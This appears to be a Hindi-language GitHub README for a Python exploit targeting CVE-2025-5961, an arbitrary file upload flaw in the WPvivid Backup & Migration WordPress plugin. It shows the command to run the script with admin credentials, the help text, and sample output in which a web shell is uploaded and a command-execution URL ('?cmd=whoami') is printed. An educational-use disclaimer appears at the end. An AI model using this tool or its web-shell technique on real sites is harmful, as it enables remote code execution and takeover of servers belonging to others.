
माइग्रेशन, बैकअप, स्टेजिंग – WPvivid Backup & Migration <= 0.9.116 - प्रमाणित (व्यवस्थापक+) मनमाना फ़ाइल अपलोड
📈 यह भेद्यता 700,000+ इंस्टॉल वाले प्लगइन को प्रभावित करती है
WordPress के लिए Migration, Backup, Staging – WPvivid Backup & Migration प्लगइन, wpvivid_upload_import_files फ़ंक्शन में फ़ाइल प्रकार सत्यापन की कमी के कारण, 0.9.116 तक (और सहित) सभी संस्करणों में मनमानी फ़ाइल अपलोड के प्रति संवेदनशील है।
यह प्रमाणित हमलावरों (व्यवस्थापक स्तर और ऊपर) को सर्वर पर मनमानी फ़ाइलें अपलोड करने की अनुमति देता है, जिससे संभावित रूप से रिमोट कोड निष्पादन सक्षम हो सकता है।
इस रिपॉजिटरी में CVE-2025-5961 के लिए Python में लिखी गई एक एक्सप्लॉइट स्क्रिप्ट है, जो:
python3 CVE-2025-5961.py -u http://target/wordpress -un admin -p password123
$ python3 CVE-2025-5961.py -h
usage: CVE-2025-5961.py [-h] -u URL -un USERNAME -p PASSWORD
CVE-2025-5961 Exploit by Khaled Alenazi (Nxploited)
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress URL
-un, --username USERNAME
Admin username
-p, --password PASSWORD
[+] Checking plugin version...
[+] Detected plugin version: 0.9.116
[+] Target is vulnerable. Continuing exploit.
[+] Logging in to http://target/wordpress...
[+] Logged in successfully.
[+] Fetching WPvivid page to extract nonce...
[+] Extracted nonce: 502d5dce0e
[+] Uploading shell...
[+] Exploit succeeded!
[+] Shell URL: http://target/wordpress/wp-content/wpvividbackups/ImportandExport/shellnxploited.php?cmd=whoami
Exploit By: Khaled Alenazi (Nxploited) - https://github.com/Nxploited/
यह स्क्रिप्ट केवल शैक्षिक और शोध उद्देश्यों के लिए प्रदान की गई है।
लेखक इस उपकरण से होने वाले किसी भी दुरुपयोग या क्षति के लिए ज़िम्मेदार नहीं है।
Khaled Alenazi (Nxploited)
🌐 GitHub